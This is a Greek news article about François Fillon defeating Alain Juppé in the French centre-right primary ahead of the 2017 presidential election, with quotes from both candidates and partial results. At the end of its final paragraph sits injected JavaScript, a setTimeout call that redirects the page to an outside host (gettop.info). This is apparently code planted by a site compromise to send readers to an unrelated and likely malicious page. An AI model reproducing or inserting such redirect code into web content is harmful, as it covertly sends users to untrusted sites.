Με τον Φιγιόν επικεφαλής στις προεδρικές εκλογές οι Κεντροδεξιοί

0
31

 

Στον δεύτερο γύρο των εσωκοματικών εκλογών στους Κεντροδεξιούς για την ανάδειξη του υποψηφίου που θα συμμετέχει στην προεδρική κούρσα του 2017 στη Γαλλία νικητής ήταν το φαβαρί, Φρανσουά Φιγιόν, ο οποίος έλαβε το χρίσμα.

Ο πρώην πρωθυπυοργός επικράτησε με μεγάλη διαφορά του αντιπάλου του, επίσης πρώην πρωθυπουργού, Αλέν Ζιπέ.

Σύμφωνα με το Reuters, σύμφωνα με τα πρώτα αποτελέσματα από το 50% των εκλογικών τμημάτων, ο Φρανσουά Φιγιόν εξασφάλισε το 68,4% των ψήφων, ενώ ο αντίπαλός του Αλέν Ζιπέ συγκέντρωσε το 31,6% των ψήφων.

Στην κατάμεστη με ψηφοφόρους αίθουσα ο Φιγιόν απηύθυνε το μήνυμα της νίκης του τονίζοντας:

«Η νίκη την οποία μοιράζομαι με όλους εσάς και τις χιλιάδες των εθελοντών που εργάσθηκαν μαζί μου, είναι μια «νίκη πεποιθήσεων».

«Η Γαλλία κατανόησε τους στόχους μου, η Γαλλία δεν αποδέχεται άλλο την υποβάθμιση, θα πρέπει να τελειώσουμε με αυτήν την αξιολύπητη πενταετία και να προχωρήσουμε προς τα εμπρός με ένα τρόπο που δεν τον τολμήσαμε εδώ και 30 χρόνια» τόνισε, προκαλώντας τα χειροκροτήματα της αίθουσας.

«Για να πετύχω στο μέλλον έχω την ανάγκη όλων σας» είπε και πρόσθεσε ότι αυτές τις ώρες έχει «μια ιδιαίτερη σκέψη για τον Σαρκοζί», πρκειμένου να συσπειρώσει τους Δεξιούς, ενώ παράλληλα έστειλε μήνυμα «φιλίας, εκτίμησης και σεβασμού» προς τον Αλέν Ζιπέ. «Αυτό το βράδυ τείνω ένα χέρι προς όλους όσους θέλουν να συνεργασθούν μαζί μου για την ανάδειξη της χώρας» υπογράμμισε.

Ο Αλέν Ζιπέ από την πλευρά του συνεχάρη θερμά τον νικητή: «Τελειώνω την εκστρατεία ως ελεύθερος άνθρωπος χωρίς να εγκαταλείψω τις πεποιθήσεις μου» τόνισε και αναγνώρισε ότι οι προκριματικές εκλογές έγιναν υπό «καλές συνθήκες» και διαβεβαίωσε ότι θα υποστηρίξει τον Φρανσουά Φιγιόν στο έργο του. Εξήγησε ότι θα συνεχίσει τη θητεία του ως δήμαρχος στην πόλη Μπορντώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here